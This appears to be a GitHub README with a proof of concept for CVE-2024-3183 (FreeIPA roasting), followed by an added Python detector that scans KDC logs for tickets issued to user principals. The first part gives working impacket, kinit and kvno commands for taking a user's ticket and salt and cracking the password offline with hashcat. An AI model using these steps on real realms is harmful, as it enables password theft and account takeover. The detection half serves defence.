Cyxow/CVE-2024-3183-POC
CVE-2024-3183-POC

POC for CVE-2024-3183 (FreeIPA Roasting)

Impact: a low-privileged user can obtain the password hashes of all domain users and brute-force them offline (Kerberoasting).

Patch impacket-getTGT:

  1. Add `decoder.decode.defaultErrorState = stGetValueDecoderByTag` to `impacket/krb5/kerberosv5.py`.
  2. Enjoy!

POC1:

  1. Add `decoder.decode.defaultErrorState = stGetValueDecoderByTag` to `impacket/krb5/kerberosv5.py`.
  2. You can use `impacket-getTGT` with the `-service` option and the `-debug` option to get the salt in one command: `impacket-getTGT test.local/user -debug -service admin`

POC2:

  1. First, request a TGT for an already compromised user (the target account is "admin"): `kinit user`
  2. Second, find out the salt of the "admin" user: `printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt`
  3. Get a TGS for "admin": `kvno admin`
  4. Use a Python script (or hashcat mode 19800 with the specific salt) to brute-force the TGS.

(Screenshot: 1 - TGS, 2 - SALT, 3 - Passwords.)

  5. Congratulations, we now have the password of the user "admin".

POC3:

  1. You can use kinit in one move: `kinit -S target user`

and you get a TGT encrypted with the target user's key.
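Every ticket-request step above leaves the same trace on the KDC side: a ticket is issued whose *server* principal is an ordinary user account (`admin`, `target`) rather than `krbtgt/REALM` or a `service/host` principal. The Python below is an added detection example, not part of this repository, that scans krb5kdc-style `ISSUE` log lines for exactly that pattern. The log line format is an assumption reconstructed from memory of krb5kdc's output, and the sample lines, realm, host names and addresses are constructed placeholders.

```python
"""Flag KDC ticket issuance where the *server* principal is a plain user.

Added detection example (not from this repository). Legitimate clients ask for
krbtgt/REALM (AS_REQ) or service/host principals (TGS_REQ); a ticket issued
"for alice@REALM" means a user account was used as a service, and its key is
what an offline brute force would then target.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample lines modelled on krb5kdc's log format (the format is an
# assumption from memory, not taken from this repository); realm, host names and
# addresses are placeholders.
SAMPLE_LOG = """\
Apr 10 12:00:01 ipa.test.local krb5kdc[1234](info): AS_REQ (4 etypes {18 17 16 23}) 10.0.0.5: ISSUE: authtime 1712750401, etypes {rep=18 tkt=18 ses=18}, user@TEST.LOCAL for krbtgt/TEST.LOCAL@TEST.LOCAL
Apr 10 12:00:02 ipa.test.local krb5kdc[1234](info): TGS_REQ (4 etypes {18 17 16 23}) 10.0.0.5: ISSUE: authtime 1712750401, etypes {rep=18 tkt=18 ses=18}, user@TEST.LOCAL for HTTP/ipa.test.local@TEST.LOCAL
Apr 10 12:00:03 ipa.test.local krb5kdc[1234](info): TGS_REQ (4 etypes {18 17 16 23}) 10.0.0.5: ISSUE: authtime 1712750401, etypes {rep=18 tkt=18 ses=18}, user@TEST.LOCAL for admin@TEST.LOCAL
Apr 10 12:00:04 ipa.test.local krb5kdc[1234](info): AS_REQ (4 etypes {18 17 16 23}) 10.0.0.5: ISSUE: authtime 1712750404, etypes {rep=18 tkt=18 ses=18}, user@TEST.LOCAL for admin@TEST.LOCAL
Apr 10 12:00:05 ipa.test.local krb5kdc[1234](info): TGS_REQ (4 etypes {18 17 16 23}) 10.0.0.9: ISSUE: authtime 1712750405, etypes {rep=18 tkt=18 ses=18}, admin@TEST.LOCAL for host/ipa.test.local@TEST.LOCAL
"""

# Pulls request kind, source address, client principal and server principal
# out of an ISSUE line; the etype list between the parentheses is skipped.
ISSUE_RE = re.compile(
    r"krb5kdc\[\d+\]\(\w+\): (?P<kind>AS_REQ|TGS_REQ) \(.*?\) (?P<ip>[\d.]+): ISSUE: "
    r".*?, (?P<client>\S+) for (?P<server>\S+)\s*$"
)


@dataclass(frozen=True)
class Finding:
    kind: str      # AS_REQ or TGS_REQ
    client: str    # requesting principal
    server: str    # principal whose key encrypts the issued ticket
    ip: str        # requester address as logged
    reason: str


def is_user_principal(principal: str) -> bool:
    """True for a principal like 'admin@REALM': no '/' component and not krbtgt.

    krbtgt/REALM@REALM and service principals (HTTP/host@REALM) contain a slash,
    so a server principal without one is a user account being used as a service.
    """
    name = principal.split("@", 1)[0]
    return "/" not in name and not name.startswith("krbtgt")


def parse_issue(line: str) -> Optional[dict]:
    """Extract kind, ip, client and server from an ISSUE line; None if no match."""
    m = ISSUE_RE.search(line)
    return m.groupdict() if m else None


def find_user_targeted_tickets(log_text: str) -> List[Finding]:
    """Return one Finding per issued ticket whose server principal is a user."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        rec = parse_issue(line)
        if rec is None or not is_user_principal(rec["server"]):
            continue
        if rec["kind"] == "AS_REQ":
            reason = "initial ticket requested for a user principal instead of krbtgt"
        else:
            reason = "service ticket requested for a user principal"
        findings.append(Finding(rec["kind"], rec["client"], rec["server"], rec["ip"], reason))
    return findings


def requesters_by_count(findings: List[Finding]) -> Dict[str, int]:
    """Which client principals are asking for user-keyed tickets, and how often."""
    return dict(Counter(f.client for f in findings))


if __name__ == "__main__":
    hits = find_user_targeted_tickets(SAMPLE_LOG)
    for f in hits:
        print(f"{f.kind:8} {f.client} -> {f.server} from {f.ip}: {f.reason}")
    print(requesters_by_count(hits))
```

On the sample input only the two tickets issued `for admin@TEST.LOCAL` are reported, both requested by `user@TEST.LOCAL`; the `krbtgt`, `HTTP/` and `host/` tickets pass. Treat a hit as a lead rather than a verdict: check the requester, the source address and whether the target account is ever expected to act as a service, and feed the per-requester counts into alerting so that one principal sweeping many user accounts stands out.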
